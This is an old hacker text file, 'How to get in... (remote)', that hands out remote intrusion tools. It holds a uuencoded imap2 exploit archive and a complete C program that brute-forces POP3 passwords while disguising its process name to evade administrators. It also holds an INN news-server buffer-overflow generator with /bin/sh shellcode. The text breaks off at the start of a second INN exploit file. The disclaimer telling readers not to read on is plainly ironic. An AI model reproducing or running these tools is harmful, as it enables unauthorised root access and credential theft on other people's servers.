How to get in... (remote)
			-------------------------------------
								by Phantom

Well, folks, once you've gotten the name of the site, it's fairly hard (:))
to get inside, especially if it has a firewall && stuph..
But, if you get enough info on that site, maybe, just maybe, you might get
in..
So, you might think of programs you could use to get a root shell or maybe a
passwd/shadow file... :)
well, you should definately look for open ports, like
imapd/httpd/sendmail/nntp/pop3 && stuff...
Well, in this file, you wont find any exploits, due to complains about how
we provide stuff to remotely break in somebody's system. So, if you have an
user there, it's your responsability, but if we provide you with such tools,
it seems people think  it's our responsability...


so, DONT READ ANY FURTHER!!!!!!!!!!!!!!!!!!!!!!!!!!! 














:)
But anyway, if you really need some of those programs, here are  a couple  of
them...
Here is an uuencoded package to exploit imap2:

begin 644 imap.tgz
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
5AC:TH0UM:$/[O[:_`&NPZ$L`H```
`
end

Now, here's a pop3 hacker...:

/* : After recently installing POP3d on a machine, I played around with it a 
: bit and came to a few conclusions:
: 	1) It allows for multiple username/password guesses
: 	2) There is no logging option for basd user/pass guesses.

: This seems like something just begging to be brute force hacked.
: Any comments?        */

#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h> 

/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT               110

/* What we want our program to be masked as, so nosy sysadmins dont kill us */
#define MASKAS                  "vi"

/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT		0



/* The function prototypes */
void nuke_string(char *);
int pop_connect(char *);
int pop_guess(char *, char *);
char *getanswer(char *);
char *getanswer_(char *);
void swallow_welcome(void);
void hackity_hack(void);

int popfd;
FILE *popfp;

FILE *userfile;
FILE *dictfile;

char host[255];
char dict[255];
char user[255];

main(int argc, char **argv)
{
   if(argc < 4)
   {
      /* invalid syntax, display syntax and exit */   
      printf("Syntax: %s host userfile dictfile\n", argv[0]);
      exit(0);
   }   
   
   /* Validate that the host exists */
   if(pop_connect(argv[1]) == -1)
   {
      /* Error */
      printf("Error connecting to host %s\n", argv[1]);
      exit(0);
   }
   printf("Connected to: %s\n\n", argv[1]);
   
   /* Check for the existance of the user file */
   userfile=fopen(argv[2], "rt");
   if(userfile==NULL)
   {
      /* Error */
      printf("Error opening userfile %s\n", argv[2]);
      exit(0);
   }
   fclose(userfile);
   
   /* Checking for the existance of dict file */
   dictfile=fopen(argv[3], "rt");
   if(dictfile==NULL)
   {
      /* Error */
      printf("Error opening dictfile %s\n", argv[3]);
      exit(0);
   }
   fclose(dictfile);
   
   /* Copy important arguments to variables */
   strcpy(host, argv[1]);
   strcpy(user, argv[2]);
   strcpy(dict, argv[3]);
               
   nuke_string(argv[0]);
   nuke_string(argv[1]);
   nuke_string(argv[2]);
   nuke_string(argv[3]);   
 strcpy(argv[0], MASKAS);

   swallow_welcome();   
   hackity_hack();
}

      
void nuke_string(char *targetstring)
{
   char *mystring=targetstring;
   
   while(*targetstring != '\0')
   {
      *targetstring=' ';
      targetstring++;
   }
   *mystring='\0';
}


int pop_connect(char *pophost)
{
   int popsocket;
   struct sockaddr_in sin;
   struct hostent *hp;
      
   hp=gethostbyname(pophost);
   if(hp==NULL) return -1;
   
   bzero((char *)&sin,sizeof(sin));
   bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
   sin.sin_family=hp->h_addrtype;
   sin.sin_port=htons(POP3_PORT);
   popsocket=socket(AF_INET, SOCK_STREAM, 0);
   if(popsocket==-1) return -1;
   if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1;
   popfd=popsocket;
   return popsocket;   
}
int pop_guess(char *username, char *password)
{
   char buff[512];
   
   sprintf(buff, "USER %s\n", username);
   send(popfd, buff, strlen(buff), 0);   
   getanswer(buff);
      
   sprintf(buff, "PASS %s\n", password);
   send(popfd, buff, strlen(buff), 0);
   getanswer(buff);
   if(strstr(buff, "+OK") != NULL)
   {
      printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password);
      return 0;
   }
   else return -1;
}

char *getanswer(char *buff)
{
   for(;;)
   {
      getanswer_(buff);
      if(strstr(buff, "+OK") != NULL) return buff;
      if(strstr(buff, "-ERR") != NULL) return buff;
   }
}

char *getanswer_(char *buff)
{
   int ch;
   char *in=buff;
   
   for(;;)
   {
      ch=getc(popfp);
      if(ch == '\r');
      if(ch == '\n')
      {
         *in='\0';
         return buff;
      }
      else
      {
         *in=(char)ch;
         in++;
      }
   }
}
void swallow_welcome(void)
{
   char b[100];  
   popfp=fdopen(popfd, "rt");      
   getanswer(b);
}


void hackity_hack(void)
{
   char *un;
   char *pw;
   char *c;
   int found=0;
   
   un=(char *)malloc(512);
   pw=(char *)malloc(512);
   if(un==NULL || pw==NULL) return;
   
   userfile=fopen(user, "rt");
   dictfile=fopen(dict, "rt");
   if(userfile == NULL || dictfile == NULL) return;
   
   for(;;)
   {
      while(fgets(un, 50, userfile) != NULL)
      {
         found=0;
         c=strchr(un, 10);
         if(c != NULL) *c=0;
         
         c=strchr(un, 13);
         if(c != NULL) *c=0;
         
         while(fgets(pw, 50, dictfile) != NULL && found==0)
         {
            c=strchr(pw, 10);
            if(c != NULL) *c=0;
            
            c=strchr(pw, 13);
            if(c != NULL) *c=0;
            
            if(strlen(pw) > 2 && strlen(un) > 2)
               if(pop_guess(un, pw)==0)
               {
                  found=1;
                  fclose(popfp);
                  close(popfd);
                  if(RECONNECT==0)
      {
                     free(pw);
                     free(un);
                     fclose(userfile);
                     fclose(dictfile);
                     exit(0);
                  }
                  pop_connect(host);
                  swallow_welcome();               
               }                           
         }
         fclose(dictfile);
         dictfile=fopen(dict, "rt");
      }
      fclose(dictfile);
      fclose(userfile);
      free(un);
      free(pw);
      exit(0);
   }
}

Anyways, you will probably need one of these thinggies: INN exploit...
----------------------------- innbuf.c --------------------------------
/*
 * This just generates the x86 shellcode and puts it in a file that nnrp
 * can send. The offset and/or esp may need changing. To compile
 * on most systems: cc innbuf.c -o innbuf. Usage: innbuf [offset] > file.
 * (C) 1997 by Method <method@arena.cwnet.com>
 * P.S. Feel free to port this to other OS's.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

#define DEFAULT_OFFSET  792
#define BUFFER_SIZE     796
#define ADDRS           80

u_long get_esp()
{
        return(0xefbf95e4);
}

int main(int argc, char **argv)
{
        char *buff = NULL;
        u_long *addr_ptr = NULL;
        char *ptr = NULL;
        int ofs = DEFAULT_OFFSET;
        int noplen;
        u_long addr;
        int i;
        u_char execshell[] =
                "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x
0f"
                "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x
52"
                "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x0
1"
                "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

        if(argc > 1)
                ofs = atoi(argv[1]);

        addr = get_esp() - ofs;

        if(!(buff = malloc(4096))) {
                fprintf(stderr, "can't allocate memory\n");
                exit(1);
        }
        ptr = buff;
        noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;
        memset(ptr, 0x90, noplen);
        ptr += noplen;
        for(i = 0; i < strlen(execshell); i++)
                *ptr++ = execshell[i];
        addr_ptr = (unsigned long *)ptr;
        for(i = 0; i < ADDRS / 4; i++)
                *addr_ptr++ = addr;
        ptr = (char *)addr_ptr;
        *ptr = '\0';

        printf(
                "Path: dev.null!nntp\n"
                "From: devNull @%s\n"
                "Newsgroups: alt.test\n"
                "Subject: 4 out of 5 Dweebs prefer INND for getting r00t\n"
                "Message-ID: <830201540.9220@dev.null.com>\n"
                "Date: 9 Jun 1997 15:15:15 GMT\n"
                "Lines: 1\n"
                "\n"
                "this line left not left intentionally blank\n"
                ".\n", buff);
}

---------------------------------------------------------------------------

---------------------------- nnrp.c --------------------------------------
/*
 * Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate.
